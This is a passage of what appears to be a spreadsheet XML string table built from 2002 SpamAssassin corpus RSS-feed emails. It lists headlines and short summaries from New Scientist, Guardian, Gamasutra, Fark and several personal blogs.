    <t>URL: [URL]http://www.newsisfree.com[/URL],8015193,1440/\nDate: Not supplied\n\nA new analysis of satellite images shows regeneration of once arid lands across \nthe southern Sahara, making farming viable again</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:41 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:41 -0000</t>
  </si>
  <si>
    <t>Right-wing governments 'increase suicide rates'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8045344,1440/\nDate: Not supplied\n\nOver the last century, an "extra" 35,000 suicides occurred under Tory rule in \nthe UK - a similar effect is apparent in Australia</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:37 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:37 -0000</t>
  </si>
  <si>
    <t>Parasites may sap male longevity</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8052858,1440/\nDate: Not supplied\n\nMales suffer more parasitic infections than females - this could help explain \nwhy they die younger, say researchers</t>
  </si>
  <si>
    <t>Lander risks missing Mars trip</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8052859,1440/\nDate: Not supplied\n\nBritish scientists vow to have their robotic probe ready for launch in 2003, \namid concerns over the project's finances</t>
  </si>
  <si>
    <t>Mayan texts reveal superpower wars</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8045341,1440/\nDate: Not supplied\n\nGory hieroglyphs found on a Guatemalan pyramid support the idea of a superpower \nstruggle at the civilisation's peak</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:36 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:36 -0000</t>
  </si>
  <si>
    <t>West Nile virus endangers blood transfusions</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8078047,1440/\nDate: Not supplied\n\nUS officials have all but confirmed that the virus - which has killed 84 people \n- can be transmitted via donated blood</t>
  </si>
  <si>
    <t>First direct estimate of hidden vCJD cases</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8062538,1440/\nDate: Not supplied\n\nTests for the infectious agent in people without symptoms do not reduce the \ndeaths predicted - larger studies are "urgently needed"</t>
  </si>
  <si>
    <t>Cosmic polarisation detected from South Pole</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8052857,1440/\nDate: Not supplied\n\nThe faint microwave afterglow of the Big Bang is polarised - the discovery \nshould help probe the birth of the Universe</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:35 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:35 -0000</t>
  </si>
  <si>
    <t>Supersonic test plane uses 'wing warping'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8081289,1440/\nDate: Not supplied\n\nThe US Air Force is set to test the steering and control technique first used \nduring the Wright brothers' famous flight in 1903</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:31 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:31 -0000</t>
  </si>
  <si>
    <t>Oil set to be pumped from blazing ship</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8086490,1440/\nDate: Not supplied\n\nThe cargo vessel ran aground off a World Heritage conservation site in South \nAfrica - raging fires are hampering salvage attempts</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:27 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:27 -0000</t>
  </si>
  <si>
    <t>Transparent token is cryptographic key</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8086489,1440/\nDate: Not supplied\n\nShining a laser through a cheap, little disc can generate an immensely powerful \nsecret code - they could be used to secure credit cards</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:26 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:26 -0000</t>
  </si>
  <si>
    <t>Radio gives mighty roar to quiet cars</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8106968,1440/\nDate: Not supplied\n\nA patented system allows drivers of hushed modern vehicles to enjoy the throaty \nengine sounds of classic cars, all in synch with your driving</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:19 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:19 -0000</t>
  </si>
  <si>
    <t>California challenges US stem cell rules</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8167824,1440/\nDate: Not supplied\n\nIt will be the only US state where medical researchers can use public funds to \ncreate embryos and extract stem cells</t>
  </si>
  <si>
    <t>Earth's magnetic field 'boosts gravity'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8132228,1440/\nDate: Not supplied\n\nThe controversial claim could be evidence of hidden extra dimensions and help a \n'theory of everything' fall into place</t>
  </si>
  <si>
    <t>US blueprint for smallpox mass-vaccination</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8171676,1440/\nDate: Not supplied\n\nDetailed guidelines for vaccinating all 288 million citizens within five days \nof an outbreak are being dispatched to every state</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:18 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:18 -0000</t>
  </si>
  <si>
    <t>Bright dust rings highlight Earth-like planets</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8171675,1440/\nDate: Not supplied\n\nRings around distant stars betray small rocky planets, say astronomers, \nsuggesting a census will soon be possible</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:17 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:17 -0000</t>
  </si>
  <si>
    <t>Human-chimp DNA difference trebled</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8182249,1440/\nDate: Not supplied\n\nWe are more unique than previously thought, according to new comparisons with \nthe genetic code of our closest relatives</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:16 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:16 -0000</t>
  </si>
  <si>
    <t>Ultrasound blood purifier tackles fat problem</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8199104,1440/\nDate: Not supplied\n\nMillions of tiny fat droplets are thought to damage the brains of most heart \nsurgery patients - sonic waves may help</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:11 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:11 -0000</t>
  </si>
  <si>
    <t>Female circumcision does not reduce sexual activity</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8206955,1440/\nDate: Not supplied\n\nNigerian researchers say their study negates arguments used to defend the \npractice, which is still widespread in Africa</t>
  </si>
  <si>
    <t>Balloon flight challenges deflate</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8251868,1440/\nDate: Not supplied\n\nTechnical problems beat a transatlantic record attempt, as the weather beats an \naltitude record attempt - for now</t>
  </si>
  <si>
    <t>British dossier on Iraqi weapons released</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8202806,1440/\nDate: Not supplied\n\nIt claims Iraq is ready to use chemical weapons and is pursuing long-range \nmissiles, but it lacks dramatic new evidence likely to win over war sceptics</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:10 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:10 -0000</t>
  </si>
  <si>
    <t>"Hidden tree" the secret of Zen garden</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8251865,1440/\nDate: Not supplied\n\nA subconsciously perceptible pattern explains the mysterious appeal of a famous \nold Japanese garden, say researchers</t>
  </si>
  <si>
    <t>South Korea bans all human cloning</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8251866,1440/\nDate: Not supplied\n\nNew laws, prompted by earlier cloning claims, promise 10 years in jail for \noffenders - but the blanket ban angers scientists</t>
  </si>
  <si>
    <t>West Nile vaccine "in three years"</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8251867,1440/\nDate: Not supplied\n\nA genetically engineered yellow fever vaccine shows promise in animal tests - \nif fast-tracked it could soon be available for humans</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:32:09 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:32:09 -0000</t>
  </si>
  <si>
    <t>Tough Earth bug may be from Mars</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8251864,1440/\nDate: Not supplied\n\nA hardy microbe that can withstand huge doses of radiation is most likely to \nhave evolved this ability on the Red Planet, argue scientists</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:52 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:52 -0000</t>
  </si>
  <si>
    <t>Some Quickies.  Lots of 'em.  Something for everyone.</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-19T21:59:17-08:00\n\nIt appears that hfb has an evil toilet. It's a good thing that Josh never met \nit. She also found some amusing lines to use at work. I could use a few of \nthose myself. It's not like we didn't...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:51 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:51 -0000</t>
  </si>
  <si>
    <t>ru stupid</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-19T22:30:15-08:00\n\nDan thinks it is evolution. To me it's stupidity, laziness, and apathy. I have \nto respectfully disagree. Or maybe I'm just being stubborn. For whatever \nreason, whenever I get e-mail from someone who: Writes "ur" instead of "you \nare" or...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:47 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:47 -0000</t>
  </si>
  <si>
    <t>I have the power!</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-25T22:21:15-08:00\n\nSo, I called the power company promptly at 8am to find out what they were \nsmoking. The allowed me to pay by credit card so that I could get reactivated \ntoday (and pay a $40 "reconnection fee" for the privilege)....</t>
  </si>
  <si>
    <t>Yahoo Finance RSS Beta</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-23T11:47:57-08:00\n\nGot a stock ticker for which you'd like to have an RSS news feed? Help test the \nbeta RSS feeds we've put up o Yahoo Finance. Take your favorite ticker, say \nYHOO, and put this URL in your news aggregator:...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:46 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:46 -0000</t>
  </si>
  <si>
    <t>New Blog Category: Yahoo</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-25T22:31:04-08:00\n\nI've added a new blog category: Yahoo. Why? Because occasionally I post stuff \nabout work, so I might as well categorize. Plus, some private e-mail has \nconvinced me that it might be a good idea. (You know who you are....</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:45 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:45 -0000</t>
  </si>
  <si>
    <t>Y! Finance RSS Feeds Update</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-25T22:51:45-08:00\n\nFirst of all, thanks for all the great feedback. I see that a lot of folks are \npulling it now. I'm working on some stats. It'll be interesting to see which \nstocks bloggers tend to watch, which aggregators they use,...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:31:44 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:31:44 -0000</t>
  </si>
  <si>
    <t>"I read that yesterday..."</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-09-25T22:56:08-08:00\n\nMatt describes something I've been experiencing a lot recently: You know you \nread too many primary sources when you read an article on slashdot and think, \n"I read that yesterday." Yeah, ever since I got into weblogs. I don't rely...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: jwz &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:30:34 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:30:34 -0000</t>
  </si>
  <si>
    <t>jwz &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>the walls are alive with the sound of insects</t>
  </si>
  <si>
    <t>URL: [URL]http://www.livejournal.com[/URL]\nDate: Not supplied\n\n[URL]http://www.livejournal.com[/URL]</t>
  </si>
  <si>
    <t>http://www.livejournal.com http://www.livejournal.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: morbus &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:30:24 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:30:24 -0000</t>
  </si>
  <si>
    <t>morbus &lt;rssfeeds@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>&lt;strong&gt;Two New AmphetaDesk Hacks&lt;/strong&gt;</t>
  </si>
  <si>
    <t>URL: 4538e94b3b2c6b19041756b37b1f9916\nDate: Not supplied\n\nSince the AmphetaDesk source code is so easily modifiable on any platform, I've \nbeen seeing some interesting hacks and modifications lately. The most powerful \nof them is l.m. orchard's newest template[1], which provides an insane amount \nof new features, including hiding old items, click counting, and an outline \nbased format. More than likely, a revised version of his hack will appear as a \nselectable template in the next version (AmphetaDesk v0.94). \n\nAlso of interest is Brian Cantoni's FTPStore[2]: _"FTPstore is a slight \naddition to the AmphetaDesk news aggregator. The modified code will retrieve \nthe personal channel list from an FTP location during startup and store it back \nto the same location during shutdown. This provides a simple method to keep \nyour saved channels in a network location. If you use AmphetaDesk at home and \nat work, for example, this feature will let you keep your list of channels in \nsync."_ It's a major improvement for AmphetaDesk users with multiple machines.\n\n[1] [URL]http://www.decafbad.com[/URL]\n[2] [URL]http://www.cantoni.org[/URL]</t>
  </si>
  <si>
    <t>http://www.decafbad.com http://www.cantoni.org</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: morbus &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:30:23 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:30:23 -0000</t>
  </si>
  <si>
    <t>&lt;strong&gt;More AmphetaDesk Reviews&lt;/strong&gt;</t>
  </si>
  <si>
    <t>URL: e59c6ca5938fc27a6995e30fc10b6482\nDate: Not supplied\n\nIt came out a while ago, but Ben Hammersley reviewed AmphetaDesk and a few \nother free aggregators in his Guardian article, Working the web: Newsreaders[1]\n. In more timely news, OSDir[2], a repository of "stable, open source apps", \nhas reviewed AmphetaDesk[3] and labels it an 'OSDir.com preferred' app. They \nalso give you the ability to rate AmphetaDesk[4] on a scale of 1-10. You can \nsee the current rating here[5].\n\n[1] [URL]http://www.guardian.co.uk[/URL],3605,781838,00.html\n[2] [URL]http://www.osdir.com[/URL]\n[3] [URL]http://osdir.com[/URL]\n[4] [URL]http://osdir.com[/URL]\n    %3Ch3%3EShow%20Your%20Support%20for%20Amphetadesk%3C/h3%3E"\n[5] [URL]http://osdir.com[/URL]\n    AmphetaDesk"</t>
  </si>
  <si>
    <t>http://www.guardian.co.uk http://www.osdir.com http://osdir.com http://osdir.com http://osdir.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:51 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:51 -0000</t>
  </si>
  <si>
    <t>Self-denial of the literary sort</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8263548,215/\nDate: 2002-09-26T04:32:57+01:00\n\n*Books:* Fay Weldon may have opted to be writer in residence at the Savoy Hotel \nin London, but Will Self has chosen a different kind of residency.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:50 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:50 -0000</t>
  </si>
  <si>
    <t>Fall in value of mortgages indicates housing slowdown</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8276089,215/\nDate: 2002-09-26T13:42:55+01:00\n\n*Money:* Further evidence of a slowdown in the housing market emerged today as \nfigures revealed a 15% drop in the total value of mortgages approved during \nAugust.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:47 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:47 -0000</t>
  </si>
  <si>
    <t>Black entrepreneurs 'face bank bias'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8276087,215/\nDate: 2002-09-26T13:42:57+01:00\n\n*Business:* Black entrepreneurs face more problems in raising money for \nstart-ups than white or Asian counterparts, new report says.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:44 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:44 -0000</t>
  </si>
  <si>
    <t>Lonely iguana discovered in Salford</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8279860,215/\nDate: 2002-09-26T15:44:55+01:00\n\n*The Northerner:* Subscribe to our free email round-up of the best of the \nnorthern English press.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: gamasutra &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:43 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:43 -0000</t>
  </si>
  <si>
    <t>Why marching is crucial</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8278079,215/\nDate: 2002-09-26T14:43:59+01:00\n\n*Comment:* The success of the mass demonstrations against the Vietnam war show \nwhy this Saturday's Stop the War march is so important, says *Paul Foot*.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:31 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:31 -0000</t>
  </si>
  <si>
    <t>Play by Play: Effective Memory Management</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],6503039,159/\nDate: 2002-08-03T08:11:17+01:00\n\nBack when 64KB was more memory than any computer would ever need, there was a \ntime when memory managers didnt exist. But gradually, new computer systems \ncame out with larger amounts of memory and designers discovered ways to eat up \nRAM faster than any system could dish it out. This discussion is based on \nTiburon's experiences in writing and rewriting the memory manager for Madden \nNFL 97 to Madden NFL 2002.</t>
  </si>
  <si>
    <t>A Non-Integer Power Function on the Pixel Shader</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],6436947,159/\nDate: 2002-08-01T09:04:55+01:00\n\nThis feature, excerpted from Wolfgang Engel's ShaderX book from Wordware \nPublishing, presents a simple shader trick that performs a good per pixel \napproximation of a non-integer power function. The technique works for input \nvalues between 0 and 1 and supports large exponents. The presented shader does \nnot require any texture look-up and is scalable, making it possible to spend \nmore instructions in order to decrease the error or to reach greater exponents.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:29 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:29 -0000</t>
  </si>
  <si>
    <t>GDC 2002: Game Scripting in Python</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],7132396,159/\nDate: 2002-08-22T03:21:04+01:00\n\nScripting languages allow rapid development of game behavior without the \npitfalls that await the unwary C++ programmer. Using an existing scripting \nlanguage saves the time and cost of developing a custom language, and typically \ngives you a far more powerful language than you could create on your own. \nPython is an excellent choice for a game scripting language because it is \npowerful, easily embedded, can seamlessly be extended with C/C++ code</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:26 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:26 -0000</t>
  </si>
  <si>
    <t>Keeping up with The Sims: Managing Large Scale Game Content</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],7506698,159/\nDate: 2002-09-04T02:10:04+01:00\n\nWith project budgets in the multiple millions of dollars and virtually no \nmargin for error, more and more development teams are under tremendous pressure \nto come out on top of the entertainment software market's cutthroat \ncompetition. No team manager wants to contemplate dropping the ball when \ncreating the vivid graphics necessary to help make a game a success. Electronic \nArts' The Sims franchise is an excellent example of this pressurized situation. \nThis article highlights the critical issues that govern the high volume asset \nproduction needed for today's most demanding games.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:25 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:25 -0000</t>
  </si>
  <si>
    <t>Conversations From GDC Europe: Bill Fulton, Zeno Colaco, Harvey Smith</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],7764729,159/\nDate: 2002-09-11T22:41:04+01:00\n\nIn the second of our series from the GDC Europe, we talk with Microsoft's Bill \nFulton about usability testing for games, SCEE's Zeno Colaco about pitching \npublishers, and Harvey Smith of Ion Storm about emergent game design.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:19 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:19 -0000</t>
  </si>
  <si>
    <t>Do you have a handlebar moustache? Then the Handlebar Club is the</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8256508,1717/\nDate: 2002-09-25T23:11:06+01:00\n\n(Some Gentleman)</t>
  </si>
  <si>
    <t>Michael Jordan may announce he's coming back to play. Dead horse</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8256507,1717/\nDate: 2002-09-25T23:11:07+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([MSNBC])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:11 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:11 -0000</t>
  </si>
  <si>
    <t>Congradulate Birthday Boy Putin. Link to send birthday wishes via</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8259315,1717/\nDate: 2002-09-26T01:15:07+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Pravda])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:10 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:10 -0000</t>
  </si>
  <si>
    <t>Month by month, 'Most Beautiful Man' winners and their galleries. sfw</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8259314,1717/\nDate: 2002-09-26T01:15:08+01:00\n\n(me)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:08 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:08 -0000</t>
  </si>
  <si>
    <t>You can't beat city hall</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8260640,1717/\nDate: 2002-09-26T02:16:22+01:00\n\n(Arizona Republic)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:07 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:07 -0000</t>
  </si>
  <si>
    <t>A man, a can, and a plan. Recipes for loser single guys</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8260638,1717/\nDate: 2002-09-26T02:16:24+01:00\n\n(Some Comic Book Guy)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:02 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:02 -0000</t>
  </si>
  <si>
    <t>Whatever-Dude.com Needs $300 Quick to Get Their Freed from their ISP</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8264811,1717/\nDate: 2002-09-26T05:19:10+01:00\n\n(whatever-dude)</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:01 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:01 -0000</t>
  </si>
  <si>
    <t>Titan to be probed. Saturn to offer post probe cigarette</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8268033,1717/\nDate: 2002-09-26T08:22:36+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([The Scotsman])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:29:00 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:29:00 -0000</t>
  </si>
  <si>
    <t>Peruvian congressman has challenged his Vice President to a duel.</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8268032,1717/\nDate: 2002-09-26T08:22:37+01:00\n\n[IMG: [URL]http://www.newsisfree.com[/URL] ([Yahoo])]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: fark &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 26 Sep 2002 15:28:59 -0000</t>
  </si>
  <si>
    <t>Thu, 26 Sep 2002 15:28:59 -0000</t>
  </si>
  <si>
    <t>Teen dies of starvation after stepfather puts him on a bus and</t>
  </si>
  <si>
